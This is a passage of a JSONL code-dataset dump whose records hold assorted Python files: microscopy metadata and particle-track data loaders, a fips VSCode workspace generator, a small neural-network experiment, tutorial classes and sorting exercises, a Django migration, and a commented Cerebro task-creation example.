1.25x or 20.0x)')\n p.add_argument('--print_ROI', action='store_true',\n help='print ROI (for the specified stain and magnification) as x0 y0 width height')\n p.add_argument('--target_magnification', action=\"store\", default='',\n help='if specified, scale ROI to the desired magnification')\n\n args = p.parse_args()\n\n meta_file = args.meta_path + os.path.sep + 'meta.json'\n if not os.path.exists(meta_file):\n raise RuntimeError(\"Cannot find \" + meta_file)\n\n with open(meta_file, 'r') as fd:\n meta = json.load(fd)\n\n if args.list_stains:\n stains = list()\n for k in meta:\n if k in ['mpp_x', 'mpp_y', 'objective']:\n continue\n stains.append(k)\n print(' '.join(stains))\n\n return\n\n if args.print_ROI:\n stain = args.stain\n if len(stain) == 0 or stain not in meta:\n raise RuntimeError(\"Stain not specified or not in the meta.json file\")\n mag = args.magnification\n if len(mag) == 0 or \"mag:\"+mag not in meta[stain]:\n raise RuntimeError(\"Magnification not specified or not in meta.json file\")\n sm = float(mag[:-1]) # drop 'x' at the end\n if len(args.target_magnification) == 0:\n args.target_magnification = args.magnification\n tm = float(args.target_magnification[:-1])\n f = tm / sm\n mag = 'mag:' + mag\n\n x = int(floor(f * float(meta[stain][mag]['from_original_x'])))\n y = int(floor(f * float(meta[stain][mag]['from_original_y'])))\n w = int(floor(f * float(meta[stain][mag]['from_original_width'])))\n h = int(floor(f * float(meta[stain][mag]['from_original_height'])))\n\n print(x, y, w, h, sep=' ')\n\n return\n\n\n##\nif __name__ == \"__main__\":\n main()","sub_path":"tools/cp_meta.py","file_name":"cp_meta.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"161749675","text":"import numpy as np\nfrom utilities import calc_eta, calc_phi, filter_samples, filter_objects\n\nclass ActsData():\n \"\"\"Empty class for setting variables as attributes\"\"\"\n pass\n\ndef load_data(filename):\n \"\"\"\n Retrieve data from one file\n Returns a data object with attributes for each numpy array\n \"\"\"\n d = ActsData()\n f = np.load(filename, encoding='bytes')\n # Track level truth quantities\n d.true_theta = f['truth_Theta']\n d.true_eta = calc_eta(d.true_theta)\n d.true_phi = f['truth_Phi']\n d.true_qop = f['truth_QoverP']\n d.true_pt = np.abs(1/d.true_qop)\n # Detector hit measurements\n d.nstep = f['Filter_nSteps']\n d.rphi = f['Meas_RPHI']\n d.z = f['Meas_z']\n d.r = f['Cyl_R']\n d.phi = calc_phi(d.rphi, d.r)\n d.KF_z = f['Filter_z']\n d.KF_phi = f['Filter_Phi']\n d.KF_r = f['Filter_R']\n return d\n\ndef clean_data(data, fix_phi=False):\n \"\"\"\n Cleans up the data, selecting barrel tracks and good hits.\n \"\"\"\n barrel_tracks = np.abs(data.true_eta) < 1\n d = ActsData()\n\n # filter out all tracks not perfectly in the barrel.\n d.true_theta, d.true_eta, d.true_phi, d.true_qop, d.true_pt = (\n filter_samples(barrel_tracks, data.true_theta, data.true_eta,\n data.true_phi, data.true_qop, data.true_pt))\n d.nstep, d.rphi, d.z, d.r, d.phi = (\n filter_samples(barrel_tracks, data.nstep, data.rphi,\n data.z, data.r, data.phi))\n d.KF_z, d.KF_phi, d.KF_r = (\n filter_samples(barrel_tracks, data.KF_z, data.KF_phi,\n data.KF_r))\n\n # To select the actual layer hits, I select the indices of the steps\n # I want. I'm currently taking the middle of each detector layer triplet,\n # and ignoring all of the apparent \"auxiliary\" steps. 
This assumes\n # all tracks have the fixed 31 steps as previously discovered, so it's\n # a bit fragile and will need to be updated if the data changes.\n assert np.all(d.nstep == 31)\n #good_hit_idxs = np.array([1, 4, 9, 11, 14, 17, 20, 24, 27])\n good_hit_idxs = np.array([2, 5, 8, 11, 15, 18, 21, 25, 28])\n d.rphi, d.z, d.r, d.phi = filter_objects(\n good_hit_idxs, d.rphi, d.z, d.r, d.phi)\n d.KF_r, d.KF_z, d.KF_phi = filter_objects(\n good_hit_idxs, d.KF_r, d.KF_z,d.KF_phi)\n \n # Current data has some funny artifacts in phi.\n # Here is a shitty, hacky correction. Needs to be fixed upstream.\n if fix_phi:\n for i in range(d.phi.shape[1]):\n phi = d.phi[:,i]\n phi = phi * np.pi * 2 / (phi.max() - phi.min())\n d.phi[:,i] = phi - phi.min() - np.pi\n for i in range(d.KF_phi.shape[1]):\n KF_phi = d.KF_phi[:,i]\n KF_phi = KF_phi * np.pi * 2 / (KF_phi.max() - KF_phi.min())\n d.KF_phi[:,i] = KF_phi - KF_phi.min() - np.pi\n\n # Calculate theta\n d.theta = np.arctan(d.r / d.z)\n # Fix negative values so theta ranges from (0, pi)\n negidx = d.theta < 0\n d.theta[negidx] = d.theta[negidx] + np.pi\n d.eta = calc_eta(d.theta)\n\n return d\n","sub_path":"rnnlhc/rnnlhc/fitting/acts_data.py","file_name":"acts_data.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"100621028","text":"'''VSCode helper functions'''\nimport platform, subprocess, os, json, shutil, copy\nfrom mod import util, log, dep\n\nname = 'vscode'\nplatforms = ['osx','linux','win']\noptional = True\nnot_found = 'used as IDE with vscode configs'\n\n#------------------------------------------------------------------------------\ndef try_exists(exe_name):\n try:\n if platform.system() == 'Windows':\n subprocess.check_output('{} --version'.format(exe_name), shell=True)\n else:\n subprocess.check_output([exe_name, '--version'])\n return True\n except (OSError, subprocess.CalledProcessError):\n return False\n\n#------------------------------------------------------------------------------\ndef exe_name():\n if try_exists('code'):\n return 'code'\n else:\n # open source version on RaspberryPi\n return 'code-oss'\n\n#------------------------------------------------------------------------------\ndef check_exists(fips_dir) :\n \"\"\"test if 'code' is in the path\n :returns: True if code is in the path\n \"\"\"\n if exe_name() != 'code':\n return try_exists('code-oss')\n else:\n return True\n\n#------------------------------------------------------------------------------\ndef match(build_tool):\n return build_tool == 'vscode'\n\n#------------------------------------------------------------------------------\ndef run(proj_dir):\n exe = exe_name()\n proj_name = util.get_project_name_from_dir(proj_dir)\n try:\n subprocess.call('{} .vscode/{}.code-workspace'.format(exe, proj_name), cwd=proj_dir, shell=True)\n except OSError:\n log.error(\"Failed to run Visual Studio Code as '{}'\".format(exe))\n\n#-------------------------------------------------------------------------------\ndef write_launch_json(fips_dir, proj_dir, vscode_dir, cfg, proj_settings):\n '''write the .vscode/launch.json file'''\n launch = {\n 'version': '0.2.0',\n 'configurations': []\n }\n proj_name = util.get_project_name_from_dir(proj_dir)\n deploy_dir = util.get_deploy_dir(fips_dir, proj_name, cfg['name'])\n launch_config = {\n 'request': 'launch',\n 'program': '${command:cmake.launchTargetPath}',\n 'cwd': deploy_dir,\n 'args': [],\n\n }\n host_platform = util.get_host_platform()\n 
if host_platform == 'win':\n launch_config['type'] = 'cppvsdbg'\n elif host_platform == 'linux':\n launch_config['type'] = 'cppdbg'\n launch_config['MIMode'] = 'gdb'\n else:\n # on macOS, use the CodeLLDB extension, since the MS C/C++ debugger\n # integration seems all kinds of broken\n #launch_config['type'] = 'cppdbg'\n #launch_config['MIMode'] = 'lldb'\n launch_config['type'] = 'lldb'\n\n launch_config['name'] = 'Debug Current Target'\n launch['configurations'].append(copy.deepcopy(launch_config))\n\n launch_config['name'] = 'Debug Current Target (Stop at Entry)'\n if launch_config['type'] == 'lldb':\n launch_config['stopOnEntry'] = True\n else:\n launch_config['stopAtEntry'] = True\n launch['configurations'].append(copy.deepcopy(launch_config))\n\n # add a python code-generator debug config\n #\n # FIXME: this no longer works (e.g. pythonPath is not recognized)\n #\n #proj_name = util.get_project_name_from_dir(proj_dir)\n #build_dir = util.get_build_dir(fips_dir, proj_name, cfg['name'])\n #c = {\n # 'name': 'fips codegen',\n # 'type': 'python',\n # 'request': 'launch',\n # 'stopOnEntry': True,\n # 'pythonPath': '${config:python.pythonPath}',\n # 'program': build_dir + '/fips-gen.py',\n # 'args': [ build_dir + '/fips_codegen.yml' ],\n # \"cwd\": proj_dir,\n # \"debugOptions\": [\n # \"WaitOnAbnormalExit\",\n # \"WaitOnNormalExit\",\n # \"RedirectOutput\"\n # ]\n #}\n #launch['configurations'].append(c)\n\n # add a python debug config for each fips verb\n #\n # FIXME: this no longer works (e.g. pythonPath is not recognized)\n #\n # for verb_name, verb_mod in verb.verbs.items() :\n # # ignore standard verbs\n # if fips_dir not in inspect.getfile(verb_mod):\n # c = {\n # 'name': 'fips {}'.format(verb_name),\n # 'type': 'python',\n # 'request': 'launch',\n # 'stopOnEntry': True,\n # 'pythonPath': '${config:python.pythonPath}',\n # 'program': proj_dir + '/fips',\n # 'args': [ verb_name ],\n # 'cwd': proj_dir,\n # \"debugOptions\": [\n # \"WaitOnAbnormalExit\",\n # \"WaitOnNormalExit\",\n # \"RedirectOutput\"\n # ]\n # }\n # launch['configurations'].append(c)\n\n launch_path = vscode_dir + '/launch.json'\n log.info(' writing {}'.format(launch_path))\n with open(launch_path, 'w') as f:\n json.dump(launch, f, indent=1, separators=(',',':'))\n\n#-------------------------------------------------------------------------------\ndef write_code_workspace_file(fips_dir, proj_dir, impex, cfg):\n '''write a multiroot-workspace config file'''\n vscode_dir = proj_dir + '/.vscode'\n proj_name = util.get_project_name_from_dir(proj_dir)\n deploy_dir = util.get_deploy_dir(fips_dir, proj_name, cfg['name'])\n ws = {\n 'folders': [],\n 'settings': {\n 'cmake.statusbar.advanced': {\n 'ctest': { 'visibility': 'hidden' },\n 'testPreset': { 'visibility': 'hidden' },\n 'debug': { 'visibility': 'hidden' },\n },\n 'cmake.debugConfig': { 'cwd': deploy_dir },\n 'cmake.autoSelectActiveFolder': False,\n 'cmake.ignoreCMakeListsMissing': True,\n 'cmake.configureOnOpen': False,\n }\n }\n # add dependencies in reverse order, so that main project is first\n for dep_proj_name in reversed(impex):\n dep_proj_dir = util.get_project_dir(fips_dir, dep_proj_name)\n excluded = False\n if 'vscode_exclude_from_workspace' in cfg:\n for exclude_dep in cfg['vscode_exclude_from_workspace']:\n if dep_proj_name == exclude_dep:\n excluded = True\n break\n if not excluded:\n ws['folders'].append({ 'path': dep_proj_dir })\n proj_name = util.get_project_name_from_dir(proj_dir)\n ws_path = '{}/{}.code-workspace'.format(vscode_dir, proj_name)\n 
log.info(' writing {}'.format(ws_path))\n with open(ws_path, 'w') as f:\n json.dump(ws, f, indent=1, separators=(',',':'))\n\n#-------------------------------------------------------------------------------\ndef remove_vscode_tasks_launch_files(fips_dir, proj_dir, impex, cfg):\n '''walks through the dependencies, and deletes the .vscode/tasks.json\n and .vscode/launch.json files\n '''\n for dep_proj_name in reversed(impex):\n dep_proj_dir = util.get_project_dir(fips_dir, dep_proj_name)\n tasks_path = dep_proj_dir + '/.vscode/tasks.json'\n launch_path = dep_proj_dir + '/.vscode/launch.json'\n if os.path.exists(tasks_path):\n log.info(' deleting {}'.format(tasks_path))\n os.remove(tasks_path)\n if os.path.exists(launch_path):\n log.info(' deleting {}'.format(launch_path))\n os.remove(launch_path)\n\n#-------------------------------------------------------------------------------\ndef write_workspace_settings(fips_dir, proj_dir, cfg, proj_settings):\n '''write the VSCode launch.json, tasks.json and\n c_cpp_properties.json files from cmake output files\n '''\n log.info(\"=== writing Visual Studio Code config files...\")\n vscode_dir = proj_dir + '/.vscode'\n if not os.path.isdir(vscode_dir):\n os.makedirs(vscode_dir)\n # fetch all project dependencies\n success, impex = dep.get_all_imports_exports(fips_dir, proj_dir)\n if not success :\n log.warn(\"missing import project directories, please run 'fips fetch'\")\n remove_vscode_tasks_launch_files(fips_dir, proj_dir, impex, cfg)\n write_launch_json(fips_dir, proj_dir, vscode_dir, cfg, proj_settings)\n write_code_workspace_file(fips_dir, proj_dir, impex, cfg)\n\n#-------------------------------------------------------------------------------\ndef cleanup(fips_dir, proj_dir):\n '''goes through all dependencies and deletes the .vscode directory'''\n # fetch all project dependencies\n success, impex = dep.get_all_imports_exports(fips_dir, proj_dir)\n if not success :\n log.warn(\"missing import project directories, please run 'fips fetch'\")\n log.info(log.RED + 'Please confirm to delete the following directories:' + log.DEF)\n for dep_proj_name in reversed(impex):\n dep_proj_dir = util.get_project_dir(fips_dir, dep_proj_name)\n vscode_dir = dep_proj_dir + '/.vscode/'\n if os.path.isdir(vscode_dir):\n log.info(' {}'.format(vscode_dir))\n if util.confirm(log.RED + 'Delete those directories?' 
+ log.DEF):\n for dep_proj_name in reversed(impex):\n dep_proj_dir = util.get_project_dir(fips_dir, dep_proj_name)\n vscode_dir = dep_proj_dir + '/.vscode/'\n if os.path.isdir(vscode_dir):\n log.info(' deleting {}'.format(vscode_dir))\n shutil.rmtree(vscode_dir)\n log.info('Done.')\n else:\n log.info('Nothing deleted, done.')\n","sub_path":"mod/tools/vscode.py","file_name":"vscode.py","file_ext":"py","file_size_in_byte":9432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"497464912","text":"from nn import simple_neural as nn\nimport numpy as np\nfrom numpy import genfromtxt\nimport csv\nimport datagen\nfrom sklearn.model_selection import train_test_split\nfrom matplotlib import pyplot as plt\n\n\n\n\n\ndef generate_tests(num_tests=36, num_drivers=10000, beta_weight=1):\n\tdata, classes = datagen.function(num_drivers, beta_weight=beta_weight)\n\tX_train, X_test, y_train, y_test = train_test_split(data, classes, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\ttest_size=0.20, random_state=420)\n\treturn X_train, X_test, y_train, y_test\n\n\ndef index_of_threshold(array, threshold=1):\n\tcount = len(array)\n\tfor i in xrange(count):\n\t\tif (array[i] >= threshold):\n\t\t\treturn i+1\n\t\t\n\treturn -1\n\nnn_parameters = {\n 'learning_rate': 0.001,\n 'training_epochs': 10,\n 'batch_size': 1,\n 'display_step': 1,\n 'test_step': 1,\n}\n\nnn_network_def = {\n 'dim_input': 36,\n 'dim_layer1': 150,\n 'dim_layer2': 250,\n 'dim_output': 4,\n}\n\n\n\n\nbeta_weights_list = [0.01, 0.05, 0.15, 0.25, 0.5, 0.75, 1.0]\nsize95array = []\nnn_accuracy_data = []\nfor weight in beta_weights_list:\n\t# Size of the feature vector\n\tsize_for_95 = -1\n\n\tfor size in xrange(1, 36):\n\t\tnn_network_def['dim_input'] = size\n\t\tX_train, X_test, y_train, y_test = generate_tests(beta_weight = weight)\n\t\tX_train = X_train[:,0:size]\n\t\tX_test = X_test[:,0:size]\n\t\tepochs, accuracy, cost = nn.multilayer_perceptron(X_train, X_test, \n\t\t\t\t\t\t\t\ty_train, y_test, \n\t\t\t\t\t\t\t\tnn_parameters=nn_parameters, \n\t\t\t\t\t\t\t\tnn_network_def=nn_network_def)\n\n\t\tif index_of_threshold(accuracy, threshold=0.95) > -1:\n\t\t\tsize_for_95 = index_of_threshold(accuracy, threshold=0.95)\n\t\t\tbreak\n\n\tsize95array.append(size_for_95)\n\n\t# We want to plot accuracy in the y axis and epochs in the x\n\nplt.plot(beta_weights_list, size95array)\nplt.show()\n\n","sub_path":"neural.py","file_name":"neural.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"29236782","text":"class Car():\n def __init__(self, make, model, year):\n self.make = make\n self.model = model\n self.year = year\n # 指定默认值\n self.odometer_reading = 0\n\n def get_name(self):\n long_name = str(self.year) + ' ' + self.make + ' ' + self.model\n return long_name.title()\n\n def read_odometer(self):\n print(\"this car has \" + str(self.odometer_reading) + \" miles on it.\")\n\n # 修改属性的值 方式二:通过方法修改\n def update_odometer(self, mileage):\n if mileage >= self.odometer_reading:\n self.odometer_reading = mileage\n else:\n print(\"you can't roll back an odometer.\")\n\n # 修改属性的值 方式三:通过方法对属性的值进行递增\n def increment_odometer(self, miles):\n self.odometer_reading += miles\n\n\nif __name__ == '__main__':\n my_car = Car('audi', 'a4', 2016)\n print(my_car.get_name())\n\n # 修改属性的值 方式一:直接修改\n # my_car.odometer_reading = 23\n\n my_car.update_odometer(23)\n my_car.read_odometer()\n\n my_car.increment_odometer(100)\n 
my_car.read_odometer()\n","sub_path":"fundamental/类/demo01/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}{"seq_id":"351841748","text":"# Recursive merge sort; sorts a in place and prints each merged range.\r\ndef merge_sort(a, start, end):\r\n if len(a)>1:\r\n mid=len(a)//2\r\n left=a[:mid]\r\n right=a[mid:]\r\n \r\n merge_sort(left, start, start+mid-1)\r\n merge_sort(right, start+mid, end)\r\n \r\n i, j, k=0,0,0\r\n while i<len(left) and j<len(right):\r\n if left[i]<right[j]:\r\n a[k]=left[i]\r\n i+=1\r\n else:\r\n a[k]= right[j]\r\n j+=1\r\n k+=1\r\n\r\n while j <len(right):\r\n a[k]=right[j]\r\n j+=1\r\n k+=1\r\n while i <len(left):\r\n a[k]=left[i]\r\n i+=1\r\n k+=1\r\n print(start, end, a[0], a[-1])\r\n return a\r\n\r\nn = int(input())\r\na = list(map(int, input().split()))[:n]\r\nmerge_sort(a,1,len(a))\r\nprint(*a)","sub_path":"модуль 2. задание 3.py","file_name":"модуль 2. задание 3.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}{"seq_id":"269284693","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('catalog', '0015_auto_20150426_1135'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='product',\n name='is_bestseller',\n field=models.BooleanField(default=False, help_text=\"Select this ONLY if you select a picture of the product inside Product's masonry thumbnail\", verbose_name='Show product on home page'),\n ),\n migrations.AlterField(\n model_name='productsize',\n name='name',\n field=models.CharField(help_text='**REQUIRED**. Pick a name for a size', unique=True, max_length=15, verbose_name='Product size'),\n ),\n migrations.AlterField(\n model_name='productsize',\n name='name_el',\n field=models.CharField(help_text='**REQUIRED**. Pick a name for a size', max_length=15, unique=True, null=True, verbose_name='Product size'),\n ),\n migrations.AlterField(\n model_name='productsize',\n name='name_en',\n field=models.CharField(help_text='**REQUIRED**. Pick a name for a size', max_length=15, unique=True, null=True, verbose_name='Product size'),\n ),\n migrations.AlterField(\n model_name='productsize',\n name='name_it',\n field=models.CharField(help_text='**REQUIRED**. 
Pick a name for a size', max_length=15, unique=True, null=True, verbose_name='Product size'),\n ),\n ]\n","sub_path":"catalog/migrations/0016_auto_20150426_1356.py","file_name":"0016_auto_20150426_1356.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"399248459","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nПримеры создания задач.\nЭтот модуль демонстритует, как можно устанавливать соединение с базой данных,\nсоздавать задачи и связывать их между собой без использования графического интерфейса Cerebro.\nТакже в модуле продемонстрировано создание сообшений и прикладывание к ним файлов.\n\nМодуль использует пакет pycerebro (для Python 3.x), который входит в дистрибутив service-tools (http://cerebrohq.com/distribs/service-tools.zip).\nТак же модуль pycerebro доступен на GitHub (https://github.com/cerebrohq/cerebro-plugins/tree/master/end-plugins/pycerebro)\nПакет pycerebro содержит модули для установки соединения с базой данных\nи для доступа к файловому хранилищу(Cargador).\n\nПакет pycerebro использует сторонние модули requests и iso8601, которые используются для работы с базой данных.\nВозможно вам придется дополнительно установить эти пакеты.\n\nМодуль содержит функции:\n\ncreate_and_link_tasks - пример создания задач и установления между ними связей.\nmake_thumnails - для генерации эскизов к видео файлам и изображениям\n\"\"\"\n\nimport fnmatch\nimport sys\nimport os\nimport subprocess\nimport datetime\n\nlocal_dir = os.path.realpath(__file__).replace('\\\\', '/').rsplit('/', 1)[0]\nbackend_dir = local_dir + '/../..'\nsys.path.append(backend_dir)\n\nfrom pycerebro import database, dbtypes, cargador # в модуле dbtypes описаны различные константы, такие как поля данных, флаги и т.п.\n\n\n# Переменные, которые вам возможно придется изменить, чтобы преспособить скpипт для вашей сети\n\ncargador_host = 'ss' # Cетевой адрес машины, где работает севрис каргадор.\n# Может быть задано сетевое имя или IP адрес. 'ss' - это имя нашего сервера, у вас этот параметр скорее всего будет иным.\n\ncargador_xmlrpc_port = 4040 # Порт 4040 - это порт для запросов по xmlrpc протоколу.\n#У вас порт может быть иным, подробнее об этом смотрите в комментариях модуля cargador пакета pycerebro.\n\ncargador_http_port = 4080 # Порт 4080 - это порт для запросов по http протоколу.\n#У вас порт может быть иным, подробнее об этом смотрите в комментариях модуля cargador пакета pycerebro.\n\nproject_name = 'Test project' # Имя проекта для тестового добавления задач. \n#Вы можете выбрать любой свой проект\n\nmirada_path = '//ss/front/cerebro/mirada.exe' # Путь, откуда запускать мираду для генерации эскизов.\n#У вас этот параметр скорее всего будет иным. Подробнее смотрите в функции\n\ndef create_and_link_tasks(db_user, db_password):\n\t\"\"\"\n\tdb_user и db_password это логин и пароль пользователя Cerebro\n\t\n\tВ этом примере мы создадим в проекте задачу и две подзадачи. \n\tУ задачи выставим время начала, у подзадач запланируем время исполнения и свяжем их между собой.\n\tТакже мы создадим у подзадач сообщения типа постановка задачи и приложим к ним файлы.\n\tМы не будем в этом примере самостоятельно писать sql-запросы, а воспольуемся функцями класса database.Database,\n\tкоторые по сути являются обертками над sql-запросами. 
\n\tОписание всех функций смотрите в модуле database пакета pycerebro.\n\t\t\n\tПример вызова функции:\n\t::\n\t\timport create_tasks\n\n\t\tcreate_tasks.create_and_link_tasks('user', 'password')\n\t::\n\t\"\"\"\n\t\n\tdef find(f, seq):\n\t\t# поиск объектов в списке\n\t\tfor item in seq:\n\t\t\tif f(item): \n\t\t\t\treturn item\n\n\ttry:\n\n\t\tdb = database.Database()\n\t\t# Устанавливаем соединение с базой данных\n\t\tif db.connect_from_cerebro_client() != 0: # пробуем установить соединение с помощью запущенного клиента Cerebro. \n\t\t\t# Если не выходит, устанавливаем с помощью логина и пароля\n\t\t\tdb.connect(db_user, db_password) \n\t\t\n\t\troot_tasks = db.root_tasks() # Получаем список корневых задач проектов.\n\t\t\n\t\t# Ищем нужную корневую задачу проекта в который и будем добовлять задачи\n\t\troot_task = find(lambda val: val[dbtypes.TASK_DATA_NAME] == project_name, root_tasks)\n\t\t\n\t\t# Создаем задачу в проекте\n\t\tnew_task_id = db.add_task(root_task[dbtypes.TASK_DATA_ID], 'New Test Task')\n\t\t\"\"\"\n\t\tФункция add_task принимает на вход два агрумента:\n\t\t- идентификатор родительской задачи, в данном случаи идентификатор корневой задачи проекта \n\t\t- имя задачи, Будте внимательны имя задачи имеет ограничения. \n\t\tПодробнее о них смотрите в описании функции add_task.\n\t\t\n\t\tРезультат функции - идентификатор новой задачи.\n\t\t\"\"\"\t\t\n\t\t\n\t\t# Устанавливаем время начала задачи в теушее время\n\t\t\"\"\"\n\t\tВремя начала задачи устанавливается в днях от 01.01.2000 в UTC\n\t\tПодробнее о этом смотрите в описании функции task_set_start.\n\t\t\"\"\"\n\t\t\n\t\tdatetime_now = datetime.datetime.utcnow()\n\t\tdatetime_2000 = datetime.datetime(2000, 1, 1)\n\t\ttimedelta = datetime_now - datetime_2000\n\t\tdays = timedelta.total_seconds()/(24*60*60)\n\t\t\n\t\tdb.task_set_start(new_task_id, days)\n\t\t\n\t\t# Создаем две подзадачи к новой задаче\n\t\tnew_subtask_id_1 = db.add_task(new_task_id, 'New Test Subtask 1')\n\t\tnew_subtask_id_2 = db.add_task(new_task_id, 'New Test Subtask 2')\n\t\t\n\t\t# Добовляем к подзадачам постановки задач с файлами\n\t\tdef_id_1 = db.add_definition(new_subtask_id_1, 'Do something 1')\n\t\tdef_id_2 = db.add_definition(new_subtask_id_2, 'Do something 2')\n\n\t\t# Во второй подзадаче создадим еще 5 задач.\n\t\t# Для удобства просто создадим 5 копий подзадачи 1\n\t\tlst_for_copy = [(new_subtask_id_1, 'Subtask 1'), \n\t\t\t(new_subtask_id_1, 'Subtask 2'),\n\t\t\t(new_subtask_id_1, 'Subtask 3'),\n\t\t\t(new_subtask_id_1, 'Subtask 4'),\n\t\t\t(new_subtask_id_1, 'Subtask 5'),] # Создадим массив типа [(ID_копируемой задачи, 'Новое имя'), ...]\n\t\tnew_tasks = db.copy_tasks(new_subtask_id_2, lst_for_copy) # Копируем в подзадачу 2\n\t\t\n\t\tfilename1 = local_dir + '/test.png' # файл для первой подзадачи\n\t\tthumbnails1 = make_thumnails(filename1) # генерация эскизов для файла filename1\n\t\tfilename2 = local_dir + '/test.mp4' # файл для второй подзадачи\n\t\tthumbnails2 = make_thumnails(filename2) # генерация эскизов файла filename2\n\t\t\n\t\t# Создаем объект для добавления файлов в файловое хранилище (Cargador)\n\t\tcarga = cargador.Cargador(cargador_host, cargador_xmlrpc_port, cargador_http_port)\n\t\t\n\t\t# Добовляем к сообщениям типа постановки задач файлы и, заодно, экспортируем их в хранилище\n\t\tdb.add_attachment(def_id_1, carga, filename1, thumbnails1, '', False)\t\t\n\t\tdb.add_attachment(def_id_2, carga, filename2, thumbnails2, '', False)\n\t\t\"\"\"\n\t\t\tПараметр carga, передается для экспортирования файла в файловое 
хранилише.\n\t\t\tПодробнее об этом смотрите в модуле cargador.\n\t\t\t\n\t\t\tПоследний параметр означает, будет ли файл добавлен как линк, без экспорта в хранилище (значение True),\n\t\t\tили же он будет экспортитован (значение False)\n\t\t\tПодробнее об этом смотрите в описании функции add_attachment.\n\t\t\"\"\"\t\t\n\t\t\n\t\t# Удаляем сгенерированные эскизы, поскольку мы их уже экспортировали в хранилище\n\t\tfor f in thumbnails1:\n\t\t\tos.remove(f)\n\t\t\n\t\tfor f in thumbnails2:\n\t\t\tos.remove(f)\n\t\t\t\n\t\t\n\t\t# Устанавливаем запланированное время на подзадачи\n\t\tdb.task_set_planned_time(new_subtask_id_1, 12.5) # первой подзадаче устанавливаем 12 с половиной часов\n\t\tdb.task_set_planned_time(new_subtask_id_2, 30) # второй подзадаче устанавливаем 30 часов\n\t\t\n\t\t# Связываем подзадачи\n\t\tdb.set_link_tasks(new_subtask_id_1, new_subtask_id_2)\n\t\t\"\"\"\n\t\tЭта связь значит, что вторая подзадача начнется после окончания первой подзадачи\n\t\t\"\"\"\n\t\t\n\texcept Exception as err:\n\t\tprint(err)\n\n\ndef make_thumnails(filename):\n\t\"\"\"\n\tПриним��ет на вход полный путь до файла видео или изображения и генерирует эскизы к ним\n\t:returns: список путей до файлов эскизов.\t\n\n\tПример вызова функции:\n\t::\t\n\t\timport create_tasks\n\n\t\tfilename = 'c:/temp/file.mov'\n\t\tthumbnails = create_tasks.create_and_link_tasks(filename)\t\t\n\t::\n\t\n\tГенерация эскизов:\t\t\t\n\tЕсли файл является изображением или видео, то можно добавить для него уменшенные эскизы.\n\tМожно добавить до 3-х эскизов (первый, средний, последний кадры).\n\tДля генерации эскизов можно использовать программу Mirada.\n\tОна постовляется вместе с дистрибутивом Cerebro. Можно использовать и другие программы для генерации,\n\tнапример, ffmpeg.\n\t\"\"\"\n\t\n\t#Пример генерации эскизов с помощью Mirada.\t\n\n\tif os.path.exists(filename) == False or os.path.exists(mirada_path) == False:\n\t\treturn list()\n\t\n\tgen_path = os.path.dirname(filename) # В качестве директории для генерации эскизов возьмем директорию добавляемого файла\n\n\t# Запускаем мираду с необходимыми ключами\n\tres_code = subprocess.call([mirada_path, filename, '--temp', gen_path, '--hide', '--mode', 'thumbstandalone'])\t\t\t\t\n\t#-temp - директория для генерации эскизов\n\t#-hide - ключ запуска мирады в скрытом режиме (без загрузки графического интерфейса) для генерации табнейлов.\n\t\n\tif res_code != 0:\n\t\traise Exception(\"Mirada returned bad exit-status.\\n\" + mirada_path)\n\t\n\t#Ищем сгенерированные мирадой эскизы.\n\t#Имени эскиза формируется из имени файла, даты и времени генерации - filename_yyyymmdd_hhmmss_thumb[number].jpg\n\t#Например: test.mov_20120305_112354_thumb1.jpg - первый эскиз видео-файла test.mov\n\t\n\tthumbnails = list()\n\tfor f in os.listdir(gen_path):\n\t\tif fnmatch.fnmatch(f, os.path.basename(filename) + '.thumb*.jpg'):\n\t\t\tthumbnails.append(gen_path + '/' + f)\n\n\tthumbnails.sort()\t\n\t\n\t\"\"\"\n\t#Пример генерации эскизов с помощью ffmpeg.\n\t\n\t#Для того, чтобы генерить эскизы с помощью ffmpeg, нужно заранее знать длительность видео,\n\t#чтобы корректно получить средний и последний кадры.\n\t#Возьмем к примеру ролик длительностью в 30 секунд.\n\n\tthumbnails = list() # список файлов для эскизов\n\tthumbnails.append(filename + '_thumb1.jpg')\n\tthumbnails.append(filename + '_thumb2.jpg')\n\tthumbnails.append(filename + '_thumb3.jpg')\n\n\tsubprocess.call(['ffmpeg', '-i', filename, '-s', '512x512', '-an', '-ss', '00:00:00', '-r', 1, '-vframes', 1, '-y', 
thumbnails[0]])\n\tsubprocess.call(['ffmpeg', '-i', filename, '-s', '512x512', '-an', '-ss', '15:00:00', '-r', 1, '-vframes', 1, '-y', thumbnails[1]])\n\tsubprocess.call(['ffmpeg', '-i', filename, '-s', '512x512', '-an', '-ss', '30:00:00', '-r', 1, '-vframes', 1, '-y', thumbnails[2]])\n\t# Описание ключей вы можете посмотреть в документации к ffmpeg\n\t\"\"\"\n\t\n\treturn thumbnails\n","sub_path":"end-plugins/pycerebro/examples/create_tasks.py","file_name":"create_tasks.py","file_ext":"py","file_size_in_byte":14092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"421988172","text":"import remove as rm\n# selection_sort의 베이스 형태.\n# def selection_sort(xs):\n# if xs != []:\n# smallest = min(xs)\n# xs.remove(smallest)\n# return [smallest]+selection_sort(xs)\n# else:\n# return []\n#######################################################\ndef selection_sort(xs):\n ss = []\n while xs != []:\n smallest = min(xs)\n rm.remove_proc(xs,smallest)\n 